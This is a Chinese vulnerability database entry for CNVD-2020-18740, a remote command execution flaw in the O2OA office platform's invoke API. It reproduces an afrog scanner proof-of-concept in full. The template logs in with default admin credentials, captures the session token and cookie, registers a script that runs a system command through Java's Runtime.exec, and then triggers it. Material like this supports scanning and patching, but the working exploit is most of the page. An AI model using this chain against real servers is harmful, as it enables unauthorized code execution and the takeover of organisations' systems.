CNVD-2020-18740: O2OA invoke 后台远程命令执行漏洞 CNVD-2020-18740

日期: 2025-09-01 | 影响软件: O2OA invoke | POC: 已公开

漏洞描述

O2OA是一款开源免费的企业及团队办公平台,提供门户管理、流程管理、信息管理、数据管理四大平台,集工作汇报、项目协作、移动OA、文档分享、流程审批、数据协作等众多功能,满足企业各类管理和协作需求。 O2OA系统invoke 接口存在远程代码执行漏洞。攻击者可利用漏洞执行任意代码。 title=="O2OA"

PoC代码[已公开]

id: CNVD-2020-18740

info:
  name: O2OA invoke 后台远程命令执行漏洞 CNVD-2020-18740
  author: zan8in
  severity: critical
  verified: true
  description: |
    O2OA是一款开源免费的企业及团队办公平台,提供门户管理、流程管理、信息管理、数据管理四大平台,集工作汇报、项目协作、移动OA、文档分享、流程审批、数据协作等众多功能,满足企业各类管理和协作需求。 O2OA系统invoke 接口存在远程代码执行漏洞。攻击者可利用漏洞执行任意代码。
    title=="O2OA"
  tags: cnvd,cnvd2020,o2oa,rce
  created: 2023/10/30

rules:
  r0:
    request:
      method: POST
      path: /x_organization_assemble_authentication/jaxrs/authentication/captcha?v=7.1&l7u46why
      headers:
        Authorization: anonymous
        Content-Type: application/json; charset=UTF-8
      body: |
        {"credential":"xadmin","password":"o2"}
    expression: response.status == 200 && response.body.bcontains(b'"type":') && response.body.bcontains(b'"success"')
    output:
      search: '"x-token=(?P<token>[\\w_]+);".bsubmatch(response.body)'
      token: search["token"]
      search1: '"Set-Cookie: (?P<cookie>.+)".bsubmatch(response.raw_header)'
      cookie: search1["cookie"]
  r1:
    request:
      method: POST
      path: /x_program_center/jaxrs/invoke?v=6.3
      headers:
        Authorization: '{{token}}'
        Content-Type: application/json; charset=UTF-8
        Cookie: '{{cookie}}'
      body: |
        {"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n    var oneline = bufReader.readLine();\n    result.push(oneline);\n    if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}
    expression: (response.status == 200 && response.body.bcontains(b'"type"') && response.body.bcontains(b'"sucess"')) || (response.body.bcontains(b'"type"') && response.status == 500 && response.body.bcontains(b'"error"'))
  r2:
    request:
      method: POST
      path: /x_program_center/jaxrs/invoke/cmd/execute
      headers:
        Content-Type: application/json; charset=UTF-8
        Cookie: '{{cookie}}'
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1() && r2()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2020/CNVD-2020-18740.yaml

相关漏洞推荐